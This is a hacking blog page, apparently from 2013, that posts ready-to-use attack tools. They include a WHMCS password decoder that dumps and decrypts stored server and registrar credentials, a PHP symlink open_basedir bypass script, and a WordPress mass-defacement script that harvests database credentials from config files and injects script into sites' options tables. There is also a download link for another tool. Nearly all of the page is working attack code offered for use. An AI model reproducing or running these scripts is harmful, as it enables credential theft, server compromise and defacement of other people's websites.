echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
if($_POST['form_action'] == 2 )
{
//include($file);
$db_host=($_POST['db_host']);
$db_user****=($_POST['db_user****']);
$db_password=($_POST['db_password']);
$db_****=($_POST['db_****']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
?><**** bgcolor="#000000">
<style>
**** { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-
ARROW-COLOR: olive; color: white;}
****area{background-color:#191919;color:red;font-
weight:bold;font-size: 12px;font-family: Tahoma; border: 1px
solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-
size: 13px;font-weight:bold;color: red; font-family: Tahoma;
border: 1px solid #666666;******:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server
Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to
configuration.php of WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="1">
<br>
<input type="****" size="30" ****="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of
WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="2">
<br>
<table border=1>
<tr><td>db_host </td><td><input type="****" size="30"
****="db_host" value="localhost"></td></tr>
<tr><td>db_user**** </td><td><input type="****"
size="30" ****="db_user****" value=""></td></tr>
<tr><td>db_password</td><td><input type="****"
size="30" ****="db_password" value=""></td></tr>
<tr><td>db_****</td><td><input type="****" size="30"
****="db_****" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</
font><br>
<?
if($_POST['form_action'] == 3 )
{
$password=($_POST['password']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$password = decrypt ($password, $cc_encryption_hash);
echo("Password is ".$password);
}
?>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="3">
<br>
<table border=1>
<tr><td>Password</td><td><input type="****" size="30"
****="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center> <font color="#FFFF6FF" size='+1'>
ilyasrobert@gmail.com </font><br><br> <center>

symlink killer sript

Posted by Yas 0 comments
                               BUAT YANG BUTUH SAJA :)


<?php //is safe mod on ? start  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")   {   $safe="<font color=red>ON</font>";  }   else {$safe="<font color=#FF0000>OFF</font>";}  echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>";  //open safe mod end--  ?>   <?php  //disable function start  echo "<font color=black>Disable functions :</font> <b>";  if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}  //disable function end--   /*  <?php //is safe mod on ? start  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")   {   $safe="<font color=red>ON</font>";  }   else {$safe="<font color=#FF0000>OFF</font>";}  echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>";  //open safe mod end--  ?>   <?php  //disable function start  echo "<font color=black>Disable functions :</font> <b>";  if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}  //disable function end--   /*  PHP 5.2.12/5.3.1 symlink() open_basedir bypass        CHUJWAMWMUZG  */   $fakedir="cx";  $fakedep=16;   $num=0; // offset of symlink.$num   if(!empty($_GET['file'])) $file=$_GET['file'];  else if(!empty($_POST['file'])) $file=$_POST['file'];  else $file="";   echo '<div align="center"> <div align="center">  <hr> <pre class="ml1"><font color="#FF0000"> </font><font color="#333333">   </font></pre> </div> </div> <p align="center"><b><font face="Tahoma" size="7">!</font></b><font color="#FF0000" face="Tahoma" size="6"> </font><font face="Tahoma" size="6"><font color="#FF0000"><b>Sy</b></font>mLink  K<font color="#FF0000"><b>iller</b></font> 0.1</font><font color="#FF0000" face="Tahoma" size="6">  </font><b><font color="#FF0000" face="Tahoma" size="7">  !</font></b></p> <p align="center"><font color="#FF0000" face="Comic Sans MS">Symlink Bypass symlink()  open_basedir</font></p> <p align="center"><font face="Comic Sans MS"></font></p> <p align="center"><font face="Comic Sans MS">Nam3 :</font><font color="#FF0000" face="Comic Sans MS">  File Nam3 That u Want T0 Create !n And ch0sse : </font><font face="Comic Sans MS">Rum  SymL!nk</font> </p> <p><form name="form"  action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF  "]).'" method="post"> <p align="center"> <input type="text" name="file" size="50"  value="'.htmlspecialchars($file).'" style="border: 1px solid #FF0000"><input type="submit" name="hym"  value="Run Symlink" style="color: #FF0000; border: 1px solid #FF0000"></p> <p align="center"><font color="#FF0000" face="Tahoma" size="5">! </font> <font face="Tahoma">Symlink Bypass symlink() open_basedir bypass </font> <font color="#FF0000" face="Tahoma" size="5">!</font></p> <p align="center"><font size="2" face="Tahoma">From :</font><font size="2" color="#FF0000" face="Tahoma">   PHP 5.2.12/5.3.1</font></p>  <hr>   </form>';   if(empty($file))  exit;   if(!is_writable("."))  die("not writable directory");   $level=0;   for($as=0;$as<$fakedep;$as++){  if(!file_exists($fakedir))  mkdir($fakedir);  chdir($fakedir);  }   while(1<$as--) chdir("..");   $hardstyle = explode("/", $file);   for($a=0;$aa<count($hardstyle);$a++){  if(!empty($hardstyle[$a])){  if(!file_exists($hardstyle[$a]))  mkdir($hardstyle[$a]);  chdir($hardstyle[$a]);  $as++;  }  }  $as++;  while($as--)  chdir("..");   @rmdir("fakesymlink");  @unlink("fakesymlink");   @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");   // this loop will skip allready created symlinks.  while(1)  if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,  "symlink".$num))) break;  else $num++;   @unlink("fakesymlink");  mkdir("fakesymlink");   die('<FONT COLOR="RED">check symlink <a  href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');    ?>


     ENJOY IT 

Smart Hunter v.1.4.3

Posted by Yas 0 comments
Smart Hunter v.1.4.3
                    SREENSHOT :                

                                     


Video Presentation of version 1.2

 Code:
http://www.youtube.com/watch?v=vbnSBNTxXbM

 Download Smart Hunter

 Code:
http://www.mediafire.com/?4vzcbm1j7imq14d
Login Password : fuck lamers

ENJOY IT !! :)

wordpress mass deface script

Posted by Yas 0 comments

<title>Wordpress MassDeface(ReCoded By ilyas_robert)</title>
<style>
body
{
        background: #0f0e0d;
        color: #FF9933;
        padding: 0px;
}
a:link, body_alink
{
        color: #FF9933;
        text-decoration: none;
}
a:visited, body_avisited
{
        color: #FF9933;
        text-decoration: none;
}
a:hover, a:active, body_ahover
{
        color: #FFFFFF;
        text-decoration: none;
}
td, th, p, li,table
{
       
        background: #2e2b28;
        border:1px solid #524f46;
}
input
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}textarea
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
button
{
        border: 1px solid;
        cursor: default;
       
        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
</style>
</head>

<body bgcolor="black">
<center>
<pre>
__          __      __  __                 _____        __              
\ \        / /     |  \/  |               |  __ \      / _|              
 \ \  /\  / / __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
  \ \/  \/ / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
   \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
    \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
           | |                                                          
           |_|                                                          
</pre>
</center>
<form method="POST" action="" >
<center>
<table border='1'><tr><td>List of All Symlink</td><td>
<input type="text" name="url" size="100" value="list.txt"></td></tr>
<tr><td>Index</td><td>
<textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
<br><br><input type="Submit" name="Submit" value="Submit">
<input type="hidden" name="action" value="1"></form>
</center>
<?
set_time_limit(0);
if ($_POST['action']=='1'){
$url=$_POST['url'];
$users=@file($url);


if (count($users)<1) exit("<h1>No config found</h1>");
foreach ($users as $user) {
$user1=trim($user);
$code=file_get_contents2($user1);
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
$db=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
$db_password=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
$p=$b5[1][0];


$d=@mysql_connect( $host, $user, $db_password ) ;
if ($d){
@mysql_select_db($db );
$source=stripslashes($_POST['index']);
$s2=strToHex(($source));
$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
$ls=strlen($s)-2;
$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
mysql_query($sql) ;
$sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
mysql_query($sql) ;
if (function_exists("mb_convert_encoding") )
{
$source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
$source2=mysql_real_escape_string($source2);
$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
@mysql_query($sql) ; ;
$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
@mysql_query($sql) ; ;
}
$aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
$siteurl=@mysql_fetch_array($aa) ;
$siteurl=$siteurl['option_value'];
$tr.="$siteurl\n";
mysql_close();
}
}
if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
}
function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        if (strlen(dechex(ord($string[$i])))==1){
        $hex .="%0". dechex(ord($string[$i]));
                }
                else
                {
                $hex .="%". dechex(ord($string[$i]));
                }
    }
    return $hex;
}

function file_get_contents2($u){

        $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$u);
        curl_setopt($ch, CURLOPT_HEADER, 0);    
   curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
            $result = curl_exec($ch);
        return $result ;
        }
       
?>


SCREENSHOT :


ENJOY IT  :D

SITE INFO

Copyright © 2013 Ilyas Cyber4rt. All rights reserved.